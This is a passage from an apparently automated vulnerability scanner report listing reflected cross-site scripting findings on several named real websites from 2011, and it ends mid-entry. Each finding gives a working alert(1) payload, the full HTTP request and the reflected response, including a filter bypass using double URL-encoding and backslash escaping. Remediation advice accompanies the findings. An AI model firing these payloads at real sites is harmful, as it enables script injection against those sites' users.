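    """The query pairs a browser would send when following the rendered link."""
    href = parse_markup(markup).link_attrs.get("href", "")
    return parse_qsl(href.split("?", 1)[1]) if "?" in href else []


if __name__ == "__main__":
    for markup in (self_link_vulnerable("/sections/traffic/", ATTR_PAYLOAD),
                   self_link_hardened("/sections/traffic/", ATTR_PAYLOAD),
                   error_text_vulnerable(TEXT_PAYLOAD),
                   error_text_hardened(TEXT_PAYLOAD)):
        print("BREAKS OUT" if breaks_out(markup) else "contained  ", markup)
```

The vulnerable link does not only execute the script: because the attribute ends at the attacker's quote, the link also loses the parameter entirely, whereas the hardened link still carries the original name and value, just percent-encoded. The same `html.escape` call is the fix for the double-quoted attribute in 4.853.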

4.855. http://www.moxiesoft.com/search.aspx [searchtext parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /search.aspx

Issue detail

The value of the searchtext request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c656\"%3balert(1)//75842e444dc was submitted in the searchtext parameter. This input was echoed as 2c656\\";alert(1)//75842e444dc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If echoing user input into a quoted JavaScript string is unavoidable, the backslash character should be blocked, or escaped by replacing it with two backslashes; the backslash must be escaped before the quotation mark is, otherwise the backslash added in front of each quotation mark is itself doubled and the quotation mark is left unescaped.

Request

GET /search.aspx?searchtext=2c656\"%3balert(1)//75842e444dc HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:06:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 26001


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<![CDATA[
/*Clear Search Cookie*/EkSearch.clrCookie();/*Set search results*/document.getElementById('__ecmsearchresult$').innerHTML="Your search for 2c656\\";alert(1)//75842e444dc - did not match any documents.<br />
...[SNIP]...

4.856. http://www.moxiesoft.com/search.aspx [searchtext parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.moxiesoft.com
Path:   /search.aspx

Issue detail

The value of the searchtext request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a3631'%3balert(1)//20ecdcf8d9 was submitted in the searchtext parameter. This input was echoed as a3631';alert(1)//20ecdcf8d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /search.aspx?searchtext=a3631'%3balert(1)//20ecdcf8d9 HTTP/1.1
Host: www.moxiesoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TalismaCookie=PPC.B.live chat.01/28/2011; ecm=user_id=0&isMembershipUser=0&site_id=&username=&new_site=/&unique_id=0&site_preview=0&langvalue=0&DefaultLanguage=1033&NavLanguage=1033&LastValidLanguageID=1033&ContType=&UserCulture=1033&SiteLanguage=1033; __utmz=162954400.1296223193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=162954400.662891325.1296223193.1296223193.1296223193.1; __utmc=162954400; __utmb=162954400.1.10.1296223193; ASP.NET_SessionId=elqucae4pira41q1xauy2i45;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 14:06:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25990


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="Head1"><link re
...[SNIP]...
<br />";document.form1.searchtext.value = 'a3631';alert(1)//20ecdcf8d9';
WebForm_InitCallback();//]]>
...[SNIP]...

4.857. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /blogs/jets/2011/01/live-chat-friday-noon-1

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70f75'%3balert(1)//84f766b9c15 was submitted in the REST URL parameter 1. This input was echoed as 70f75';alert(1)//84f766b9c15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the reflection is in a 404 Not Found response, inside the page's own inline script; a browser renders and executes a 404 body like any other page, so the status code offers no protection.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1 HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 14:10:58 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/blogs70f75';alert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1';
}


   //-->
...[SNIP]...

4.858. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11ddd'%3balert(1)//e0aca46f7df was submitted in the REST URL parameter 1. This input was echoed as 11ddd';alert(1)//e0aca46f7df in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs11ddd'%3balert(1)//e0aca46f7df/rangers/2011/01/live-chat-wednesday-at-2-pm HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 14:11:19 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...

jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/blogs11ddd';alert(1)//e0aca46f7df/rangers/2011/01/live-chat-wednesday-at-2-pm';
}


   //-->
...[SNIP]...

4.859. http://www.nydailynews.com/blogs70f75/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.nydailynews.com
Path:   /blogs70f75/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 28224'%3b7ef459ee8f9 was submitted in the REST URL parameter 1. This input was echoed as 28224';7ef459ee8f9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /blogs70f7528224'%3b7ef459ee8f9/ HTTP/1.1
Host: www.nydailynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1296227725346:ss=1296227725346; __vrf=75ibpjczis64gvwq;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Fri, 28 Jan 2011 15:06:40 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Language: en

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="imagetoolbar" content="no" />
<meta property="og:site_name" conten
...[SNIP]...
jQuery.cookie('seen_nydn_ipad', 'yep', { expires: 1 });
document.location='http://www.nydailynews.com/services/apps/ipad/redir.html?u=http://www.nydailynews.com/blogs70f7528224';7ef459ee8f9/index.html';
}


   //-->
...[SNIP]...

4.860. http://www.paperg.com/jsfb/embed.php [bid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 32aad%3balert(1)//a80c7501128 was submitted in the bid parameter. This input was echoed as 32aad;alert(1)//a80c7501128 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=3922&bid=212332aad%3balert(1)//a80c7501128 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:03:32 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=jnjnrfnrlrhjvfc5f8a69ussc1; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 37192


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL212332aad;alert(1)//a80c7501128 = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=212332aad%3balert(1)//a80c7501128';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');
...[SNIP]...

4.861. http://www.paperg.com/jsfb/embed.php [bid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the bid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61da6'-alert(1)-'499123cfafb was submitted in the bid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Caveat: the same bid value is also reflected, unencoded, into the variable name on the same line (var EMBED_URL212361da6'-alert(1)-'499123cfafb = ...). A string literal directly after an identifier in a var declaration is a syntax error, so as reflected this statement would abort the whole script and the alert would not fire in a browser. The unquoted-context payload of the preceding issue (212332aad;alert(1)//a80c7501128) avoids this by terminating the declaration and commenting out the remainder of the line. The string-context reflection on its own is still exploitable, as the arbitrary-parameter-name and pid issues below show, since those values reach only the string.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=3922&bid=212361da6'-alert(1)-'499123cfafb HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:03:29 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=qbs5k2mhh2kob2880lsp47crn4; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 37193


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL212361da6'-alert(1)-'499123cfafb = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=212361da6'-alert(1)-'499123cfafb';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length - 1 ];

...[SNIP]...

4.862. http://www.paperg.com/jsfb/embed.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3fd3'-alert(1)-'e011e92194 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=3922&bid=2123&d3fd3'-alert(1)-'e011e92194=1 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:03:49 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=80eme1m02vfhdjg7jab06jrcq6; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39301


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.paperg.com/jsfb/embed.php?pid=3922&bid=2123&d3fd3'-alert(1)-'e011e92194=1';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length - 1 ];
...[SNIP]...

4.863. http://www.paperg.com/jsfb/embed.php [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.paperg.com
Path:   /jsfb/embed.php

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d87ab'-alert(1)-'c3e491e2d18 was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsfb/embed.php?pid=3922d87ab'-alert(1)-'c3e491e2d18&bid=2123 HTTP/1.1
Host: www.paperg.com
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:03:12 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
P3P: CP="CAO PSA OUR"
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Set-Cookie: PHPSESSID=bh0qdin2b2rcmfaehtu9i1rq44; path=/
Connection: Keep-alive
Via: 1.1 AN-0016020122637050
Content-Length: 39299


var IMAGE_ROOT = 'http://www.paperg.com/beta/';
var flyerboard_root = 'http://www.paperg.com/jsfb/';
var remote_ip = '173.193.214.243';
var view = '';
var edit = '0';
var EMBED_URL2123 = 'http://www.paperg.com/jsfb/embed.php?pid=3922d87ab'-alert(1)-'c3e491e2d18&bid=2123';


   //-- getting all script elements from document
   var scripts = document.getElementsByTagName('script');

   //-- grabbing our script element
   var scriptEl = scripts[ scripts.length
...[SNIP]...

4.864. http://www.quantcast.com/p-352ZWwG8I7OVQ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.quantcast.com
Path:   /p-352ZWwG8I7OVQ

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90702"><a>8af2ecf874f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /p-352ZWwG8I7OVQ90702"><a>8af2ecf874f HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Sat, 29 Jan 2011 04:37:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<input type="text" id="query" class="search-main placeholder" name="q" autocomplete="off" value=" p-352ZWwG8I7OVQ90702"><a>8af2ecf874f" />
...[SNIP]...

4.865. http://www.quantcast.com/p-352ZWwG8I7OVQ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.quantcast.com
Path:   /p-352ZWwG8I7OVQ

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 94ea2<a>2d83a5faf87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /p-352ZWwG8I7OVQ94ea2<a>2d83a5faf87 HTTP/1.1
Host: www.quantcast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Content-Language: en
Date: Sat, 29 Jan 2011 04:37:52 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html>


<head>

<meta http-equiv="Content-Type" content="text/html; cha
...[SNIP]...
<em> p-352ZWwG8I7OVQ94ea2<a>2d83a5faf87</em>
...[SNIP]...

4.866. http://www.soundingsonline.com/about-us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /about-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b93c6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2530141dfcb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b93c6"><script>alert(1)</script>2530141dfcb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Validation is only a secondary control here: the decoded value is written into a double-quoted href attribute, so it must also be HTML-attribute-encoded at the point of output, which stops the injection regardless of how many encoding layers the request carried.

Request

GET /about-us?b93c6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2530141dfcb=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:20:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:20:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/about-us?b93c6"><script>alert(1)</script>2530141dfcb=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.867. http://www.soundingsonline.com/advertise [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /advertise

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37b12%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1404705397 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 37b12"><script>alert(1)</script>f1404705397 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /advertise?37b12%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef1404705397=1 HTTP/1.1
Host: www.soundingsonline.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1295961240451; d4dad6935f632ac35975e3001dc7bbe8=h2cehjloe672kmslinqsig8v73; count=5; __utmz=1.1295922240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/59; s_nr=1295922239670; __utma=1.435913462.1295922240.1295922240.1295961240.2; s_vnum=1298514239669%26vn%3D2;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 28 Jan 2011 17:18:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.2.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Fri, 28 Jan 2011 17:18:33 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >

...[SNIP]...
<link href="/advertise?37b12"><script>alert(1)</script>f1404705397=1&amp;format=feed&amp;type=rss" rel="alternate" type="application/rss+xml" title="RSS 2.0" />
...[SNIP]...

4.868. http://www.soundingsonline.com/boat-shop [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundingsonline.com
Path:   /boat-shop

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8086b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2ea98ea0c61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8086b"><script>alert(1)</script>2ea98ea0c61 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

